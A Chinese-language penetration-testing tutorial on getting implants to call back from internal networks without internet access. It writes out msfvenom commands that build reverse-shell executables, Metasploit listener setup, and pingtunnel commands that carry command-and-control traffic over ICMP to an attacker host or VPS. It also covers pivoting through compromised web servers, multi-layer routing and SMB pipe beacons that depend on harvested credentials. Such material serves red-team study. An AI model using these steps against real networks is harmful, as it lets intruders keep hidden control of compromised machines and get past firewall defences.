内网不出网上线学习研究
字数 1469 2025-08-23 18:31:18
内网不出网上线技术研究与实践
一、隧道技术与代理技术基础
1.1 隧道技术
隧道技术是一种在网络中创建私密通道以在不安全或公共网络上安全传输数据的方法。核心特点:
- 将一种网络协议的数据封装在另一种网络协议的数据包中传输
- 适用于内网协议被封杀的情况
- 典型应用:ICMP隧道、DNS隧道等
1.2 代理技术
代理是一种在网络中充当中间人的服务器或服务,特点包括:
- 接收来自客户端的请求,代表客户端向其他服务器或资源发出请求
- 可修改请求或在返回给客户端之前进行处理
- 适用于网络通信不通的情况
1.3 技术区别
| 特性 | 隧道技术 | 代理技术 |
|---|---|---|
| 主要作用 | 创建安全通道传输数据 | 代表客户端请求资源 |
| 适用场景 | 协议被封杀 | 网络通信不通 |
| 实现方式 | 协议封装 | 请求转发 |
二、协议被封杀情况下的解决方案
2.1 TCP协议被封杀 - MSF绕过
操作步骤:
- 生成后门:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=444 -f exe > msf.exe
- MSF启动监听(监听333端口):
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
- Kali使用pingtunnel工具开启隧道服务:
./pingtunnel -type server
- Windows开启隧道(将本地444端口ICMP协议数据转发到攻击机IP的333端口):
pingtunnel.exe -type client -l 127.0.0.1:444 -s 192.168.4.1(kali) -t 192.168.4.1:333 -tcp 1 -noprint 1 -nolog 1
2.2 TCP协议被封杀 - CS绕过
操作步骤:
- 使用icmp1生成后门程序
- Kali使用pingtunnel工具开启隧道服务:
./pingtunnel -type server
- Windows开启隧道(将本地5555端口ICMP协议数据转发到攻击机IP的6666端口):
pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.4.1(kali) -t vps地址:6666 -tcp 1 -noprint 1 -nolog 1
三、完全无网络连接情况下的解决方案
3.1 CS上线方法
- 获取web主机权限(常规web渗透)
- 在win7上生成本地后门(因vps无法直接与用户主机通讯)
- 将2222的监听器生成后门程序,上传至用户主机执行
- 进入web服务器会话交换,连接用户主机的2222端口
3.2 MSF上线方法
- 获取web服务器权限
- 添加路由
- 生成后门(连接地址可使用0.0.0.0或127.0.0.1)
- 将后门上传到用户主机执行
- Kali开启监听
三层内网扩展:
- 先添加路由
- 开启代理转发
- 设置代理
四、防火墙限制下的上线技术
4.1 连接类型分析
正向连接:
- 从客户端到服务器或目标系统的连接
- 常见于浏览器连接网站、设备连接服务器等场景
- 受防火墙限制较大
反向连接:
- 从服务器或目标系统到客户端或其他系统的连接
- 常用于恶意软件、僵尸网络等场景
- 较难被目标系统防御机制察觉
4.2 代理上线技术
操作流程:
- windows_server2008和win7按常规方法上线
- 对于win10(受防火墙限制):
- 尝试反向连接
- 利用win7进行转发上线
- 生成反向连接监听器并上传到win10执行
4.3 SMB管道技术
适用场景:
- 目标主机做了入站规则,拒绝反向连接
- 防火墙正向规则仅允许访问打印机/SMB服务
操作步骤:
- 新建SMB管道
- 使用可通信主机进行端口扫描
- 找到扫描出来的主机(需提前收集账号密码)
- 监听器选择刚生成的SMB管道
- 会话选择能通信的网段主机(如win10)
五、工具与命令总结
5.1 常用工具
- pingtunnel:ICMP隧道工具
- Metasploit Framework:渗透测试框架
- Cobalt Strike:渗透测试工具
5.2 关键命令
# MSF生成payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=x -f exe > output.exe
# pingtunnel服务端
./pingtunnel -type server
# pingtunnel客户端
pingtunnel.exe -type client -l 127.0.0.1:端口 -s 攻击机IP -t 目标IP:端口 -tcp 1 -noprint 1 -nolog 1
# MSF监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT x
exploit
六、注意事项
- 账号密码收集是SMB管道技术的前提条件
- 隧道技术会受网络环境限制,需根据实际情况调整
- 防火墙规则分析是关键,需先确定允许的协议和端口
- 多层内网环境需要逐级建立路由和代理
- 操作前应做好充分的环境侦察和信息收集